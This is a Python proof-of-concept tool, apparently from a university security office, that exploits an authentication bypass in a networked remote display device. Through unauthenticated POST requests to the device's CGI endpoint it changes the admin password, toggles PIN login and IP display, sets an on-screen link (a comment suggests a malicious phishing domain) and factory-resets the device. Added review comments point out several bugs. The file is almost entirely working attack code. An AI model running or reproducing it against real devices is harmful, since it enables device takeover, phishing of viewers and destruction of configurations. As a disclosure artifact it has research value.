#!/usr/bin/env python ## POC remote display authentication bypass tool ## Carnegie Mellon Univeristy ## Information Security Office ## Author: Brian W. Gray ## Initial Creation Date: 07.02.2014 ## Last updated: 07.07.2014 version="%prog 0.03a" import urllib import urllib2 try: import xml.etree.cElementTree as ET # Load cElemenTree for performance gain except ImportError: import xml.etree.ElementTree as ET # Fail back to ElementTree if cElementTree is not available from optparse import OptionParser usage = "usage: %prog -i [address] -a [action] -o [option input]" parser = OptionParser(usage=usage, version=version) parser.add_option("-i", "--ip", dest="selHost", help="Provide the device address [192.168.100.10]", metavar="value") parser.add_option("-a", "--action", dest="selAction", help="Select an action [password, pin, setpin, showip, setlink, status, factoryreset]", metavar="value") parser.add_option("-o", "--option", dest="selOption", help="Provide an option to the Action [password [yourPassword], pin [enable / disable], setpin [0000], showip [enable / disable], setlink [hostname], status [query], factoryreset [raze]]", metavar="value") (options, args) = parser.parse_args() if not options.selHost: parser.error('A device address was not provided. Use -h for help') if not options.selAction: parser.error('An action selection was not provided. Use -h for help') if not options.selOption: parser.error('An option was not provided. Use -h for help') selHost = options.selHost selAction = options.selAction selOption = options.selOption optionValue = "0" # Set device return_test.cgi URI. 
# Plain HTTP, no TLS: the command and any password set with -a password
# travel in cleartext and are visible to anyone on the path.
url = 'http://' + selHost + '/cgi-bin/return_test.cgi'

# Each branch below builds the raw value of the ``command`` form field for
# the chosen action.  The field formats are device-specific and are
# reproduced here exactly as found; nothing in this script validates them.

# Set a new password
if selAction == "password":
    buildCommand = "Pwd_admin"+selOption+""

# Enable or Disable pins
elif selAction == "pin":
    if selOption == "enable":
        optionValue = "1"
    elif selOption == "disable":
        optionValue = "0"
    else:
        print('\r\nYou have provided an Unknown option for configuring pins options are enable or disable defaulting to disable')
        optionValue = "0"
    buildCommand = "LoginCodeType"+optionValue+""

# Set a static pin for the on screen display.
elif selAction == "setpin":
    # NOTE(review): int(selOption) raises ValueError on non-numeric input, so
    # the "defaulted to 0000" fallback below is only reached for out-of-range
    # integers, not for garbage input.
    if int(selOption) >= 0 and int(selOption) < 10000 :
        print ('\r\nSetting pin to ' + selOption)
    else:
        print('\r\nYou have provided an invalid option and the pin has defaulted to 0000')
        selOption = "0000"
    buildCommand = "LoginCodeType2videooutput4Resolution4LOGIN"+selOption+"UNDER_SCAN0UNDER_SCX00UNDER_SCY00UNDER_SCX165535UNDER_SCY165535"

# Enable or Disable the on screen display of the ip address.
elif selAction == "showip":
    if selOption == "enable":
        optionValue = "1"
    elif selOption == "disable":
        optionValue = "0"
    else:
        print('\r\nYou have provided an Unknown option for showip options are enable or disable defaulting to disable')
        optionValue = "0"
    buildCommand = "OSDIPOnOff"+optionValue+""

# Rename the host to display a custom link on screen. ex. (-a setlink -o malicious.collectingyour.info) Combine with (-a showip -o disable) actions.
elif selAction == "setlink":
    buildCommand = "DOMAIN_NAME"+selOption+"WL_ESSID"+selOption+"ControlSystemId5"

# Query device status for debugging.
elif selAction == "status":
    if selOption == "query":
        buildCommand = ""
    else:
        # NOTE(review): this branch is broken as written -- ``query`` is not
        # defined anywhere in the file (NameError), and even if it were,
        # buildCommand is never assigned here, so the POST section below
        # would fail with a second NameError.
        print('\r\n -o query is being assumed to request device status')
        selOption = query

# Reset the device to factory defaults.
elif selAction == "factoryreset":
    # Destructive action; the explicit "raze" confirmation token is the only
    # guard, and it lives in this client, not on the device.
    if selOption == "raze":
        buildCommand = "r99"
    else:
        print('\r\nYou must supply -o raze to reset this device to factory settings')
        exit()
else:
    print('\r\nYou have selected an Unknown Action')
    exit()

# Build and send HTML POST
# The request body is a single url-encoded field, ``command``.  No cookie,
# token, or Authorization header is attached: the endpoint is exercised
# unauthenticated, which is the bypass this PoC documents.
values = {}
values['command'] = buildCommand
data = urllib.urlencode(values)
# NOTE(review): the header *value* itself begins with "User-Agent: ", so the
# wire header reads "User-Agent: User-Agent: CMU/2.2 ...".  Probably a
# copy-paste slip; harmless for the PoC, but a detection rule keying on the
# exact string should expect the doubled prefix.
headers = { 'User-Agent' : 'User-Agent: CMU/2.2 CFNetwork/672.0.8 Darwin/14.0.0' }
req = urllib2.Request(url, data, headers)
response = urllib2.urlopen(req)
html = response.read()

# Parse and display Boa response
# NOTE(review): the device's reply is untrusted input parsed straight into
# ElementTree with no size limit; if this is ever reused against arbitrary
# hosts, prefer a hardened parser (e.g. defusedxml) or cap the read.
root = ET.fromstring(html)
print ("\r\nBoa service response: \r\n")
# for node in root.findall(".//*"):
# root.iter() walks the whole tree, root included, in document order.
for node in root.iter():
    print node.tag, ":", node.text
print ("\r\n")
exit()